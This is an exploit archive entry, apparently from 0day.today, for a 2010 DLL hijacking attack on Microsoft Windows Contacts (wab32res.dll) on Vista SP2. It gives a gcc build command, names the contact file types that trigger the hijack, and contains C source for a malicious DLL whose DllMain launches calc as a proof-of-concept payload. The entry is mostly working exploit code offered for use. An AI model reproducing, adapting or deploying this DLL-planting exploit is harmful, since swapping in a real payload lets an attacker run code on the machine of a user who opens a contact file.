Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)

2010-08-25T00:00:00
ID 1337DAY-ID-13847
Type zdt
Reporter sToRm
Modified 2010-08-25T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ===============================================================
Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
===============================================================

/*

Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
Date: August 25, 2010
Author: storm ([email protected])
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o wab32res.dll Contacts-DLL.c

.contact, .group, .p7c, .vcf, and .wab files are affected.

*/

#include <windows.h>

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  hax();
  return 0;
}



#  0day.today [2018-03-13]  #